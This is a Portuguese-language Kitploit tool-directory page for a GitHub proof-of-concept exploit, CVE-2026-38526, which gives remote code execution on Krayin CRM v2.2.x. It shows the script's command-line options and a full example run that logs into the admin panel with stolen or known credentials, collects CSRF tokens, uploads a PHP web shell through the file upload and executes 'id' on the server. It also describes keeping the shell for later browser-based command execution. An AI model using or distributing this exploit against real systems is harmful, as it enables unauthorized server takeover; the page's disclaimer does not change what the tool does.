Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-38526-KrayinCRM-RCE — Exploit CVE-2026-38526 | por infrar3d | Kitploit
Ferramentas/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce

CVE-2026-38526-KrayinCRM-RCE

Exploit CVE-2026-38526 | por infrar3d

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1há 1 mêsAinda não revisado
Compartilhar

CVE-2026-38526 - Krayin CRM RCE

xpl0ited by infrar3d

Este é um proof-of-concept de Execução Remota de Código (RCE) especificamente projetado para Krayin CRM v2.2.x, um sistema de gerenciamento de relacionamento com o cliente de código aberto. O script automatiza a exploração de uma vulnerabilidade de upload de arquivo na interface administrativa do CRM para alcançar a execução remota de comandos no servidor alvo.

Uso:

root@kitploit:~
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND

Krayin CRM RCE Exploit

options:
  -h, --help            show this help message and exit
  -rh, --rhost RHOST    Remote host
  -u, --username USERNAME
                        Username or E-mail
  -p, --password PASSWORD
                        Password
  -c, --command COMMAND
                        Command to execute
                                         

Exemplo:

root@kitploit:~
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'

[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================
                                                                                         

Este script faz upload de um shell PHP cmd do revshells.com por padrão.

Após a exploração, você pode abri-lo no seu navegador e enviar comandos a partir da página web.

⚠️ Aviso Legal ⚠️

Este software e código proof-of-concept são fornecidos apenas para fins educacionais e de pesquisa.

  • Os autores não são responsáveis por qualquer uso indevido ou dano causado por este programa.
  • Não use contra qualquer sistema sem permissão explícita prévia.
  • O uso deste ferramentas para atacar alvos sem consentimento é ilegal.

Você é responsável por obedecer a todas as leis aplicáveis. Use com ética e responsabilidade.

Baixar ferramenta